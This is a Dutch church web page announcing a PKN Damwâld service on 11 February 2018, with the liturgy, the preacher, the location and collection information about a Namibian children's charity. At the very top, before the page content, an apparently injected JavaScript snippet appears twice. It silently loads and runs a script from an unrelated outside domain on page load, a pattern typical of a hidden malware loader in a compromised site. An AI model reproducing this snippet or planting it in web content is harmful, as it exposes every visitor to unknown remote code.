;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 februari 2018 14:00 uur - PKN Damwâld
zondag 11 februari 2018
14:00 uur

Kerkdienst zondag 11 februari 2018 14:00 uur

Thema: “Je schikken in je lot of schuilen bij God”

Informatie

Voorganger:Ds. A. Elverdink, Eastermar
Organist:Nienke van der Heide-Visser
Thema:“Je schikken in je lot of schuilen bij God”
Liturgie
Lied voor de dienst ELB 203
Welkom en mededelingen
We zingen: Psalm 62: 1, 5
Onze Hulp en Groet
Gebed
We lezen: Psalm 91
We zingen: Psalm 91: 1, 2
Preek : “Je schikken in je lot of schuilen bij God”
We zingen: Psalm 91: 5, 6
Geloofsbelijdenis .
We zingen: Ps. 27: 1, 7
Gebeden
Collecte
We zingen: Psalm 121
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St. Beautiful Kidz Namibia

Beautiful Kidz Namibia is een Christelijke, Interkerkelijke organisatie. In een eigen dagverzorgingscentrum in de sloppenwijk "Katutura"van de hoofdstad Windhoek wordt sinds 2003 steun geboden aan kinderen in nood. In 2014 is de organisatie uitgebreid met het dagopvangcentrum in Ovitoto. Het gaat om steun aan kwetsbare kinderen die veelal het slachtoffer zijn geworden van de HIV/AIDS epidemie. Vader en/of moeder zijn aan de gevolgen van AIDS overleden en in veel gevallen zijn de kinderen zelf ook seropositief. Het met nauwelijks twee miljoen inwoners dun bevolkte land Namibia telt 200.000 weeskinderen! Er is een groot tekort aan opvang voor deze kinderen. Beautiful Kidz gaat de uitdaging aan!

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds